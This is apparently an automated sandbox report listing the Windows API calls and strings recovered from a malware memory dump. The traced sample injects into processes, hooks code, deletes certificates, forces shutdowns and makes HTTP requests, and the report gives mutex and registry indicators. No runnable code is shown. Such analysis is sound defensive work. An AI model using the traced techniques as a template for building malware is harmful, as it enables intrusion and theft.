EnterCriticalSection.KERNEL32(02843648), ref: 02815E64
LeaveCriticalSection.KERNEL32(02843648), ref: 02815EDC

Part of subcall function 0280A509: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 0280A54A
Part of subcall function 0280A509: PathRenameExtensionW.SHLWAPI(?,?), ref: 0280A59B

Part of subcall function 0280A5B2: memset.MSVCRT ref: 0280A757
Part of subcall function 0280A5B2: memcpy.MSVCRT ref: 0280A780
Part of subcall function 0280A5B2: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000), ref: 0280A885
Part of subcall function 0280A5B2: WriteFile.KERNEL32(?,?,?,?,00000000), ref: 0280A8A1

Sleep.KERNEL32(000007D0), ref: 02815ECF

Part of subcall function 0280A947: memset.MSVCRT ref: 0280A969

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0281F7DB, Relevance: 7.7, APIs: 5, Instructions: 217

APIs

LoadLibraryW.KERNEL32(?), ref: 0281F838
GetProcAddress.KERNEL32(?,?), ref: 0281F860
StrChrA.SHLWAPI(?,00000040), ref: 0281F987

Part of subcall function 02816A69: HeapFree.KERNEL32(00000000,02991E90,02811877,?,00000000,02824986,?,?,00000001), ref: 02816A76

StrChrW.SHLWAPI(?,00000040,?,?), ref: 0281F968

Part of subcall function 0282C3E0: lstrlenW.KERNEL32(02807C5C), ref: 0282C3FC
Part of subcall function 0282C3E0: lstrlenW.KERNEL32(?), ref: 0282C402
Part of subcall function 0282C3E0: memcpy.MSVCRT ref: 0282C426

FreeLibrary.KERNEL32 ref: 0281FA6D

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0282CB99, Relevance: 7.7, APIs: 4, Instructions: 179

APIs

memcpy.MSVCRT ref: 0282CD50

Part of subcall function 0282CB99: memcpy.MSVCRT ref: 0282CBB0
Part of subcall function 0282CB99: CharLowerA.USER32 ref: 0282CC7B
Part of subcall function 0282CB99: CharLowerA.USER32(?), ref: 0282CC8B

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02811FF8, Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 173

APIs

Part of subcall function 02832DBA: WSAGetLastError.WS2_32 ref: 02832DF0
Part of subcall function 02832DBA: WSASetLastError.WS2_32(00002775), ref: 02832E54

memcmp.MSVCRT ref: 02812038
memcmp.MSVCRT ref: 02812050
memcpy.MSVCRT ref: 02812085

Part of subcall function 0282F70B: memcpy.MSVCRT ref: 0282F718

Part of subcall function 0282F8BA: memcpy.MSVCRT ref: 0282F8E7

Part of subcall function 0280FF1E: EnterCriticalSection.KERNEL32(?,?,00000002,?,?,02812175,?,?,00000000,?,00000001,?,0000002C,?,0000002C), ref: 0280FF57
Part of subcall function 0280FF1E: LeaveCriticalSection.KERNEL32(0000002C,?,?,00000002,?,?,02812175,?,?,00000000,?,00000001,?,0000002C,?,0000002C), ref: 0280FF7B

Part of subcall function 02811F85: GetTickCount.KERNEL32 ref: 02811F92

Part of subcall function 02832AB4: memset.MSVCRT ref: 02832AC9
Part of subcall function 02832AB4: getsockname.WS2_32(?,0280C22C,?), ref: 02832ADC

Part of subcall function 0283306E: memcmp.MSVCRT ref: 02833090

Part of subcall function 02826C9A: memcmp.MSVCRT ref: 02826D07
Part of subcall function 02826C9A: memcpy.MSVCRT ref: 02826E14
Part of subcall function 02826C9A: memcmp.MSVCRT ref: 02826F11
Part of subcall function 02826C9A: memset.MSVCRT ref: 02826F76
Part of subcall function 02826C9A: memcpy.MSVCRT ref: 02826F87

Strings

GET , xrefs: 02812032
POST , xrefs: 0281204A

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 028165F3, Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 115

APIs

Part of subcall function 02815D25: memset.MSVCRT ref: 02815D35

lstrlenA.KERNEL32(?,?,?), ref: 028166BC
lstrlenA.KERNEL32(?), ref: 028166CF

Part of subcall function 0282CB99: memcpy.MSVCRT ref: 0282CBB0
Part of subcall function 0282CB99: CharLowerA.USER32 ref: 0282CC7B
Part of subcall function 0282CB99: CharLowerA.USER32(?), ref: 0282CC8B
Part of subcall function 0282CB99: memcpy.MSVCRT ref: 0282CD50

Part of subcall function 02816AE4: memcpy.MSVCRT ref: 02816AF7

Part of subcall function 02816A69: HeapFree.KERNEL32(00000000,02991E90,02811877,?,00000000,02824986,?,?,00000001), ref: 02816A76

Strings

?*, xrefs: 028166B1
:, xrefs: 0281670A
:, xrefs: 02816731

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0281D9E7, Relevance: 7.6, APIs: 5, Instructions: 101

APIs

Part of subcall function 02815A4F: GetLastError.KERNEL32(?,?,0280B9B4), ref: 02815A51
Part of subcall function 02815A4F: TlsGetValue.KERNEL32(?,?,0280B9B4), ref: 02815A6E
Part of subcall function 02815A4F: TlsSetValue.KERNEL32(00000001), ref: 02815A80
Part of subcall function 02815A4F: SetLastError.KERNEL32(?,?,0280B9B4), ref: 02815A90

GetProcessId.KERNEL32(?), ref: 0281DA83

Part of subcall function 0282BE5A: CreateMutexW.KERNEL32(02842974,00000001,?), ref: 0282BEA0
Part of subcall function 0282BE5A: GetLastError.KERNEL32(?,?,?,00000002,00000000), ref: 0282BEAC
Part of subcall function 0282BE5A: CloseHandle.KERNEL32 ref: 0282BEBA

Part of subcall function 0280FBD5: TlsGetValue.KERNEL32(00000026,?,0281D975), ref: 0280FBDE

Part of subcall function 02824A6B: DuplicateHandle.KERNEL32(000000FF,?,?,?,00000000,00000000,00000002), ref: 02824A89
Part of subcall function 02824A6B: DuplicateHandle.KERNEL32(000000FF,?,?,?,00000000,00000000,00000002), ref: 02824AC4
Part of subcall function 02824A6B: WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 02824B04
Part of subcall function 02824A6B: WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 02824B27
Part of subcall function 02824A6B: VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 02824B77

GetThreadContext.KERNEL32 ref: 0281DAE5
SetThreadContext.KERNEL32(?,?), ref: 0281DB24
VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 0281DB3B
CloseHandle.KERNEL32(?), ref: 0281DB45

Part of subcall function 02815AD5: GetLastError.KERNEL32(?,0280BA1E), ref: 02815AD6
Part of subcall function 02815AD5: TlsSetValue.KERNEL32(00000000), ref: 02815AE6
Part of subcall function 02815AD5: SetLastError.KERNEL32(?,?,0280BA1E), ref: 02815AED

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0280C77A, Relevance: 7.6, APIs: 6, Instructions: 61

APIs

Part of subcall function 0280F1A8: EnterCriticalSection.KERNEL32(02843510,?,0280C78E,?,?,?,00000001,02824DE8,00000001), ref: 0280F1B8
Part of subcall function 0280F1A8: LeaveCriticalSection.KERNEL32(02843510,?,0280C78E,?,?,?,00000001,02824DE8,00000001), ref: 0280F1E2

memset.MSVCRT ref: 0280C7BC
memset.MSVCRT ref: 0280C7C8
memset.MSVCRT ref: 0280C7D4
InitializeCriticalSection.KERNEL32 ref: 0280C7EC
InitializeCriticalSection.KERNEL32 ref: 0280C807
InitializeCriticalSection.KERNEL32 ref: 0280C844

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0282071B, Relevance: 7.5, APIs: 5, Instructions: 43

APIs

CertOpenSystemStoreW.CRYPT32(00000000,?), ref: 02820734
CertDuplicateCertificateContext.CRYPT32(?,?,00000000), ref: 02820745
CertDeleteCertificateFromStore.CRYPT32(?,?,?,00000000), ref: 02820750
CertEnumCertificatesInStore.CRYPT32(?,00000000), ref: 02820758
CertCloseStore.CRYPT32(?,00000000,?,00000000), ref: 02820766

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0280DB89, Relevance: 7.5, APIs: 5, Instructions: 28

APIs

SetEvent.KERNEL32(00000000), ref: 0280DB95
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0280DBA6
CloseHandle.KERNEL32(00000000), ref: 0280DBAF
CloseHandle.KERNEL32(00000000), ref: 0280DBBE

Part of subcall function 02816A69: HeapFree.KERNEL32(00000000,02991E90,02811877,?,00000000,02824986,?,?,00000001), ref: 02816A76

DeleteCriticalSection.KERNEL32(029927B8,?,0280DB81,029927B8), ref: 0280DBD5

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 028210E0, Relevance: 7.5, APIs: 4, Instructions: 113

APIs

Part of subcall function 02820D39: RegOpenKeyExW.ADVAPI32(?,00000000,00000000,?,?), ref: 02820D60

RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0282113B
RegEnumKeyExW.ADVAPI32(00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 028211A5
RegFlushKey.ADVAPI32(00000000), ref: 028211D3
RegCloseKey.ADVAPI32(00000000), ref: 028211DA

Part of subcall function 02821051: EnterCriticalSection.KERNEL32(02843510,?,?,00000000,028211FB,?,?,?,7C809C98,00000014,00000000), ref: 02821067
Part of subcall function 02821051: LeaveCriticalSection.KERNEL32(02843510,?,?,00000000,028211FB,?,?,?,7C809C98,00000014,00000000), ref: 0282108F
Part of subcall function 02821051: GetModuleHandleW.KERNEL32(advapi32.dll), ref: 028210AB
Part of subcall function 02821051: GetProcAddress.KERNEL32 ref: 028210B2
Part of subcall function 02821051: RegDeleteKeyW.ADVAPI32(?,?), ref: 028210D4

Part of subcall function 02816A69: HeapFree.KERNEL32(00000000,02991E90,02811877,?,00000000,02824986,?,?,00000001), ref: 02816A76

Part of subcall function 028169B0: HeapAlloc.KERNEL32(00000008,?,?,0281519B,?,?,?,?,028246A1,?,028249A5,?,?,00000001), ref: 028169C1

Part of subcall function 02820D19: RegFlushKey.ADVAPI32 ref: 02820D29
Part of subcall function 02820D19: RegCloseKey.ADVAPI32 ref: 02820D31

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02819F57, Relevance: 7.4, APIs: 4, Instructions: 87

APIs

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,00000000,?,?,0280B41A,?), ref: 02819F69

Part of subcall function 028307B1: CoCreateInstance.OLE32(028017F8,00000000,00004401,02801858,?), ref: 028307C6

#2.OLEAUT32(0280B41A,00000000,?,?,?,0280B41A,?), ref: 02819F9D
#6.OLEAUT32(?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,0280B41A,?), ref: 02819FD2
CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 02819FF2

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0282575A, Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 68

APIs

memset.MSVCRT ref: 02825774

Part of subcall function 0282BAD3: memcpy.MSVCRT ref: 0282BAEE
Part of subcall function 0282BAD3: StringFromGUID2.OLE32(?), ref: 0282BB92

Part of subcall function 02809F72: memcpy.MSVCRT ref: 02809F80

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 028257BA

Part of subcall function 0282432D: memcpy.MSVCRT ref: 0282439E
Part of subcall function 0282432D: PathRemoveBackslashW.SHLWAPI ref: 028243A8
Part of subcall function 0282432D: memcpy.MSVCRT ref: 028243F1
Part of subcall function 0282432D: memcpy.MSVCRT ref: 0282441E
Part of subcall function 0282432D: PathRemoveBackslashW.SHLWAPI(?), ref: 02824428

Strings

Software\Microsoft\Yfosteyq, xrefs: 0282576E 02825773 028257FB
Global\{F1516FED-D191-40B4-FB56-FD56EA1DDE44}, xrefs: 0282577F

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02816E19, Relevance: 7.4, APIs: 4, Instructions: 57

APIs

memcpy.MSVCRT ref: 02816E41
memcpy.MSVCRT ref: 02816E5E
select.WS2_32(00000000,?,00000000,00000000,00000000), ref: 02816E74
WSASetLastError.WS2_32(0000274C), ref: 02816E83

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0280CBBC, Relevance: 7.3, APIs: 4, Instructions: 139

APIs

Part of subcall function 0280F1EF: memcmp.MSVCRT ref: 0280F1FB

Part of subcall function 0280F20B: memset.MSVCRT ref: 0280F219
Part of subcall function 0280F20B: memcpy.MSVCRT ref: 0280F23A
Part of subcall function 0280F20B: memcpy.MSVCRT ref: 0280F260
Part of subcall function 0280F20B: memcpy.MSVCRT ref: 0280F284

TryEnterCriticalSection.KERNEL32(?,00000000,?,?,?,?,0280D203,?,?,00000000,?,?,?,?,00000000,0000EA60), ref: 0280CC39

Part of subcall function 02816A69: HeapFree.KERNEL32(00000000,02991E90,02811877,?,00000000,02824986,?,?,00000001), ref: 02816A76

LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,?,?,?,0280D203,?,?,00000000,?), ref: 0280CCB3
EnterCriticalSection.KERNEL32(?,?,?,00000000,?,?,?,?,0280D203,?,?,00000000,?), ref: 0280CCD2

Part of subcall function 0280F0E1: memcmp.MSVCRT ref: 0280F0FD

LeaveCriticalSection.KERNEL32(?,?,00000001,?,?,?,?,00000000,?,?,?,?,0280D203,?,?,00000000), ref: 0280CD20

Part of subcall function 0280EEE2: memcpy.MSVCRT ref: 0280EFC1
Part of subcall function 0280EEE2: memcpy.MSVCRT ref: 0280EFE2

Part of subcall function 0282D95F: GetSystemTime.KERNEL32(?), ref: 0282D969

Part of subcall function 0280EDAE: memcpy.MSVCRT ref: 0280EDF9

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0281258C, Relevance: 7.3, APIs: 4, Instructions: 120

APIs

GetUserNameExW.SECUR32(00000002,?,?,00000001,?,00000000), ref: 028125BA
GetSystemTime.KERNEL32(?), ref: 0281260D
CharLowerW.USER32(?), ref: 0281265D
PathRenameExtensionW.SHLWAPI(?,?), ref: 0281268D

Part of subcall function 02816A69: HeapFree.KERNEL32(00000000,02991E90,02811877,?,00000000,02824986,?,?,00000001), ref: 02816A76

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02834D77, Relevance: 7.3, APIs: 4, Instructions: 111

APIs

Part of subcall function 02834B12: EnterCriticalSection.KERNEL32(02843510,02991E90,02834D87,?,02991E90), ref: 02834B22
Part of subcall function 02834B12: LeaveCriticalSection.KERNEL32(02843510,?,02991E90), ref: 02834B51

Part of subcall function 0280D2F7: VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?), ref: 0280D315
Part of subcall function 0280D2F7: VerQueryValueW.VERSION(?,?,?,?), ref: 0280D382

GetCommandLineW.KERNEL32 ref: 02834E01
CommandLineToArgvW.SHELL32 ref: 02834E08
LocalFree.KERNEL32 ref: 02834E48

Part of subcall function 02816997: HeapAlloc.KERNEL32(00000000,00000024,?,028117BF,?,00000000,02824986,?,?,00000001), ref: 028169A8

GetModuleHandleW.KERNEL32(?), ref: 02834E8A

Part of subcall function 0283509F: PathFindFileNameW.SHLWAPI(00000000), ref: 028350E0

Part of subcall function 02817D68: InitializeCriticalSection.KERNEL32 ref: 02817D88

Part of subcall function 02833C83: StrCmpNIW.SHLWAPI(?,?,00000000), ref: 02833C98
Part of subcall function 02833C83: StrCmpIW.SHLWAPI(?,?), ref: 02833CA2

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0280C5FE, Relevance: 7.3, APIs: 4, Instructions: 104

APIs

EnterCriticalSection.KERNEL32(?,77C475F0,?,?,?,?,?,0280D203,?,?,00000000,?,?,?,?,00000000), ref: 0280C631

Part of subcall function 0282D0A9: WaitForSingleObject.KERNEL32(?,00000000), ref: 0282D0B5

memcmp.MSVCRT ref: 0280C67F

Part of subcall function 028132C5: memcpy.MSVCRT ref: 028132FB
Part of subcall function 028132C5: memcpy.MSVCRT ref: 0281330F
Part of subcall function 028132C5: memset.MSVCRT ref: 0281331D

SetEvent.KERNEL32 ref: 0280C6C0

Part of subcall function 0280F825: InterlockedDecrement.KERNEL32(00000004,00000004,00000000), ref: 0280F82D

LeaveCriticalSection.KERNEL32(?,?,77C475F0,?,?,?,?,?,0280D203,?,?,00000000,?), ref: 0280C6ED

Part of subcall function 02831E96: EnterCriticalSection.KERNEL32(?,?,?,?,0280CAC8,?,?,00000000,?,?,?,00000000,0000EA60), ref: 02831E9C
Part of subcall function 02831E96: memcmp.MSVCRT ref: 02831EC8
Part of subcall function 02831E96: memcpy.MSVCRT ref: 02831F13
Part of subcall function 02831E96: LeaveCriticalSection.KERNEL32(?,00000000,?,?,?,00000000,0000EA60), ref: 02831F1F

Part of subcall function 0280CBBC: TryEnterCriticalSection.KERNEL32(?,00000000,?,?,?,?,0280D203,?,?,00000000,?,?,?,?,00000000,0000EA60), ref: 0280CC39
Part of subcall function 0280CBBC: LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,?,?,?,0280D203,?,?,00000000,?), ref: 0280CCB3
Part of subcall function 0280CBBC: EnterCriticalSection.KERNEL32(?,?,?,00000000,?,?,?,?,0280D203,?,?,00000000,?), ref: 0280CCD2
Part of subcall function 0280CBBC: LeaveCriticalSection.KERNEL32(?,?,00000001,?,?,?,?,00000000,?,?,?,?,0280D203,?,?,00000000), ref: 0280CD20

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0282AF4A, Relevance: 7.3, APIs: 4, Instructions: 91

APIs

DuplicateHandle.KERNEL32(000000FF,?,?,00000000,00000000,00000002,0283F128), ref: 0282AF7C
DuplicateHandle.KERNEL32(000000FF,?,?,00000000,00000000,00000002), ref: 0282AF9C

Part of subcall function 028169B0: HeapAlloc.KERNEL32(00000008,?,?,0281519B,?,?,?,?,028246A1,?,028249A5,?,?,00000001), ref: 028169C1

Part of subcall function 02825C1C: memset.MSVCRT ref: 02825C5F

Part of subcall function 02809F72: memcpy.MSVCRT ref: 02809F80

Part of subcall function 0280A150: memcpy.MSVCRT ref: 0280A18C
Part of subcall function 0280A150: memcpy.MSVCRT ref: 0280A1A1
Part of subcall function 0280A150: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,000001DE,00000104), ref: 0280A1D3
Part of subcall function 0280A150: memcpy.MSVCRT ref: 0280A209
Part of subcall function 0280A150: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,000003FA,00000104), ref: 0280A239
Part of subcall function 0280A150: memcpy.MSVCRT ref: 0280A26F
Part of subcall function 0280A150: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000616,00000104), ref: 0280A29F

memset.MSVCRT ref: 0282B039
memcpy.MSVCRT ref: 0282B04B

Part of subcall function 02816A69: HeapFree.KERNEL32(00000000,02991E90,02811877,?,00000000,02824986,?,?,00000001), ref: 02816A76

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 028119E0, Relevance: 7.2, APIs: 4, Instructions: 70

APIs

EnterCriticalSection.KERNEL32(02991E90), ref: 028119EE

Part of subcall function 0281353D: EnterCriticalSection.KERNEL32(02843510,02991E90,0281376F,?,?,?,?,?,0281191E,?,?,?,?,028248EB), ref: 0281354D
Part of subcall function 0281353D: LeaveCriticalSection.KERNEL32(02843510,?,?,?,?,?,0281191E,?,?,?,?,028248EB,?,?,00000000), ref: 02813575

PathFindFileNameW.SHLWAPI(?), ref: 02811A21

Part of subcall function 0281357D: VirtualProtect.KERNEL32(?,028137D4,00000080,?), ref: 028135ED
Part of subcall function 0281357D: GetCurrentThread.KERNEL32 ref: 028136AC
Part of subcall function 0281357D: GetThreadPriority.KERNEL32 ref: 028136B5
Part of subcall function 0281357D: SetThreadPriority.KERNEL32(?,0000000F), ref: 028136C6
Part of subcall function 0281357D: Sleep.KERNEL32(00000000), ref: 028136CA
Part of subcall function 0281357D: memcpy.MSVCRT ref: 028136D9
Part of subcall function 0281357D: FlushInstructionCache.KERNEL32(000000FF,00000000,00000034), ref: 028136EA
Part of subcall function 0281357D: SetThreadPriority.KERNEL32 ref: 028136F2
Part of subcall function 0281357D: GetTickCount.KERNEL32 ref: 0281370D
Part of subcall function 0281357D: GetTickCount.KERNEL32 ref: 0281371A
Part of subcall function 0281357D: Sleep.KERNEL32(00000000), ref: 02813727
Part of subcall function 0281357D: VirtualProtect.KERNEL32(?,028137D4,00000000,?), ref: 02813756

Part of subcall function 0283509F: PathFindFileNameW.SHLWAPI(00000000), ref: 028350E0

LeaveCriticalSection.KERNEL32(02991E90), ref: 02811A9E

Part of subcall function 0280BC27: PathFindFileNameW.SHLWAPI(00000000), ref: 0280BC6B

Part of subcall function 0281BE32: EnterCriticalSection.KERNEL32(02843510,02991E90,0281D8CC,?,02811988,?,?,?,?,?,?,028248EB,?,?,00000000), ref: 0281BE42
Part of subcall function 0281BE32: LeaveCriticalSection.KERNEL32(02843510,?,02811988,?,?,?,?,?,?,028248EB,?,?,00000000), ref: 0281BE71

PathFindFileNameW.SHLWAPI(?), ref: 02811A64

Part of subcall function 02833C83: StrCmpNIW.SHLWAPI(?,?,00000000), ref: 02833C98
Part of subcall function 02833C83: StrCmpIW.SHLWAPI(?,?), ref: 02833CA2

Part of subcall function 0280DA34: PathFindFileNameW.SHLWAPI(?), ref: 0280DA53
Part of subcall function 0280DA34: PathRemoveExtensionW.SHLWAPI(?), ref: 0280DA7C

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02819346, Relevance: 7.2, APIs: 4, Instructions: 65

APIs

HttpQueryInfoA.WININET(?,0000FFFF,?,?,?), ref: 02819375
GetLastError.KERNEL32(?,00000000,3D94878D,00000000,3D94878D,0282D67C,?,?,?,?,?,02807900,?,?,?), ref: 0281937B

Part of subcall function 028169B0: HeapAlloc.KERNEL32(00000008,?,?,0281519B,?,?,?,?,028246A1,?,028249A5,?,?,00000001), ref: 028169C1

memcpy.MSVCRT ref: 028193A6
HttpQueryInfoA.WININET(?,0000FFFF,?,?,?), ref: 028193BF

Part of subcall function 02816A69: HeapFree.KERNEL32(00000000,02991E90,02811877,?,00000000,02824986,?,?,00000001), ref: 02816A76

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0282D0DA, Relevance: 7.2, APIs: 4, Instructions: 61

APIs

Part of subcall function 0283046D: EnterCriticalSection.KERNEL32(028430F4,?,?,0280E3BD,00000000,?,?,00000001), ref: 0283047A
Part of subcall function 0283046D: LeaveCriticalSection.KERNEL32(028430F4,?,?,0280E3BD,00000000,?,?,00000001), ref: 02830488

QueryPerformanceCounter.KERNEL32(?), ref: 0282D0F9
GetTickCount.KERNEL32 ref: 0282D106

Part of subcall function 0280F1A8: EnterCriticalSection.KERNEL32(02843510,?,0280C78E,?,?,?,00000001,02824DE8,00000001), ref: 0280F1B8
Part of subcall function 0280F1A8: LeaveCriticalSection.KERNEL32(02843510,?,0280C78E,?,?,?,00000001,02824DE8,00000001), ref: 0280F1E2

Part of subcall function 02809A5B: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000), ref: 02809ACA
Part of subcall function 02809A5B: CryptHashData.ADVAPI32(?,?,?,00000000), ref: 02809AEF

memset.MSVCRT ref: 0282D15A
memcpy.MSVCRT ref: 0282D16A

Part of subcall function 02809A2A: CryptDestroyHash.ADVAPI32 ref: 02809A42
Part of subcall function 02809A2A: CryptReleaseContext.ADVAPI32(?,00000000), ref: 02809A53

Part of subcall function 02809B02: CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000), ref: 02809B41

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02824461, Relevance: 7.2, APIs: 4, Instructions: 56

APIs

PathSkipRootW.SHLWAPI(?), ref: 0282448B
GetFileAttributesW.KERNEL32(?), ref: 028244B8
CreateDirectoryW.KERNEL32(?,00000000), ref: 028244CC
SetLastError.KERNEL32(00000050), ref: 028244EF

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0280A46D, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 51

APIs

memset.MSVCRT ref: 0280A47C
memset.MSVCRT ref: 0280A4BF
memset.MSVCRT ref: 0280A4F5

Strings

8, xrefs: 0280A4B3

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0283E290, Relevance: 7.2, APIs: 4, Instructions: 48

APIs

SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0283EC47
UnhandledExceptionFilter.KERNEL32(02804D1C), ref: 0283EC52
GetCurrentProcess.KERNEL32 ref: 0283EC5D
TerminateProcess.KERNEL32 ref: 0283EC64

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 02832155, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 133

APIs

Part of subcall function 02823EFF: CharLowerW.USER32(?), ref: 02823FBA

Part of subcall function 02816A69: HeapFree.KERNEL32(00000000,02991E90,02811877,?,00000000,02824986,?,?,00000001), ref: 02816A76

ExitWindowsEx.USER32(00000014,80000000), ref: 0283228F
InitiateSystemShutdownExW.ADVAPI32(00000000,00000000,00000000,00000001,?,80000000), ref: 028322CF

Part of subcall function 02819C8D: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 02819CCE
Part of subcall function 02819C8D: PathRemoveFileSpecW.SHLWAPI(?), ref: 02819D17
Part of subcall function 02819C8D: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 02819D3E
Part of subcall function 02819C8D: PathRemoveFileSpecW.SHLWAPI(?), ref: 02819D87
Part of subcall function 02819C8D: SetEvent.KERNEL32 ref: 02819D9A
Part of subcall function 02819C8D: WaitForSingleObject.KERNEL32(?,000000FF), ref: 02819DAD
Part of subcall function 02819C8D: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 02819DF1
Part of subcall function 02819C8D: CharToOemW.USER32(?,?), ref: 02819E6F
Part of subcall function 02819C8D: CharToOemW.USER32(?,?), ref: 02819E81
Part of subcall function 02819C8D: ExitProcess.KERNEL32(00000000,?,?,?,?,?,?,?,00000000), ref: 02819EEC

Part of subcall function 0282582C: EnterCriticalSection.KERNEL32(02843510,?,?,?,0281E9BA), ref: 02825842
Part of subcall function 0282582C: LeaveCriticalSection.KERNEL32(02843510,?,?,?,0281E9BA), ref: 02825868
Part of subcall function 0282582C: CreateMutexW.KERNEL32(02842974,00000000,Global\{F1516FED-D191-40B4-FB56-FD56EA1DDE44}), ref: 0282587A

Part of subcall function 02812FB7: ReleaseMutex.KERNEL32 ref: 02812FBB
Part of subcall function 02812FB7: CloseHandle.KERNEL32 ref: 02812FC2

ExitWindowsEx.USER32(00000014,80000000), ref: 028322E2

Part of subcall function 028150C0: GetCurrentThread.KERNEL32 ref: 028150D4
Part of subcall function 028150C0: OpenThreadToken.ADVAPI32 ref: 028150DB
Part of subcall function 028150C0: GetCurrentProcess.KERNEL32 ref: 028150EB
Part of subcall function 028150C0: OpenProcessToken.ADVAPI32 ref: 028150F2
Part of subcall function 028150C0: LookupPrivilegeValueW.ADVAPI32(00000000,SeTcbPrivilege,?), ref: 02815113
Part of subcall function 028150C0: AdjustTokenPrivileges.ADVAPI32(00000001,00000000,?,00000000,00000000,00000000), ref: 02815128
Part of subcall function 028150C0: GetLastError.KERNEL32 ref: 02815132
Part of subcall function 028150C0: CloseHandle.KERNEL32(00000001), ref: 02815143

Part of subcall function 0282407B: memcpy.MSVCRT ref: 0282409B

Strings

SeShutdownPrivilege, xrefs: 028322B1

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 0283299E, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 51

APIs

shutdown.WS2_32(?,00000001), ref: 028329AC
WSAGetLastError.WS2_32(?,00000001,?,?,?,?,?,?,?,0282FF4F,?,?,?,00002710,?,?), ref: 028329CD
WSASetLastError.WS2_32(00000000,?,00000001), ref: 02832A12

Strings

, xrefs: 028329F3

Memory Dump Source

Source File: 00000004.00000002.1169891005.02800000.00000040.sdmp, Offset: 02800000, based on PE: true

Function 028331E5, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 30

APIs

Part of subcall function 02832755: EnterCriticalSection.KERNEL32(02843510,?,028330AF,?,?,00000000), ref: 02832765
Part of subcall function 02832755: LeaveCriticalSection.KERNEL32(02843510,?,00000000), ref: 0283278F

WSAAddressToStringA.WS2_32(?,?,00000000,?,?), ref: 0283320B
lstrcpyA.KERNEL32(?,0:0,?,00000000,?,?,?,?,?,?,02830029,?,?,?,?), ref: 0283321B

Strings

0, xrefs: 028331FD
0:0, xrefs: 02833215

Memory Dump Source

